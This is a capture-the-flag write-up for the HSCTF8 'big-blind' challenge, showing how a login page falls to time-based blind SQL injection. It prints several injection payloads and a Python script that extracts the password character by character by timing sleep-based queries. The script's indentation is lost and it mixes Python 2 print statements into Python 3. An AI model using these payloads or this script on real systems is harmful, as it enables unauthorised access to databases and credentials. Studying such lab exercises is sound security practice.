Rating: 5.0

# HSCTF8 - big-blind

- Write-Up Author: Wendy \[[MOCTF](https://www.facebook.com/MOCSCTF)\]

- Flag:**flag{any_info_is_good_info}**
## **Question:**
big-blind

![img](./img/1.png)

## Write up:

The website is simple and just a login page. When you input some characters like ', it return 500 Internal Server Error. It's SQL injection challenge.

![img](./img/2.png)

First, I use the comment symbol and time-based SQL injection payload to discover the DB table and password length.
```
admin' union select 1,2 from users #

admin' union select 1,2 from users where user='' #

admin' union select 1,2 from users where pass='' #

admin' and IF(1=(SELECT 1 FROM users WHERE Length(pass) = 27),sleep(10),0) #

```

Since the password is long and hard to guess manually. I wrote a script to guess the whole password. Finally, we see the flag is the password.

```
#!/usr/bin/env python3
import requests
import sys

def blind(query):
url = "https://big-blind.hsc.tf/"
response = requests.post(url, data={"user":"" +query+ ",sleep(5),0) #","pass":""})

if(response.elapsed.total_seconds()>3):
print query
return 'Found'

return response

keyspace = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$^&*()-=+'

query_left_side = "admin' and IF(1=(SELECT 1 FROM users WHERE pass LIKE '"
flag = ""
while True:
for x in range(1,28):
print x
for k in keyspace:
# query = admin' and IF(1=(SELECT 1 FROM users WHERE pass LIKE 'flag%'),sleep(10),0) #
query = query_left_side + flag + k + "%')"
response = blind(query)

if response == 'Found':
flag += k
break

if k == '+':
flag += '_'

```

![img](./img/3.png)

>flag{any_info_is_good_info}

Original writeup (https://github.com/MOCSCTF/CTF-Write-UP/blob/master/Web/HSCTF8%20-%20big-blind/README.md).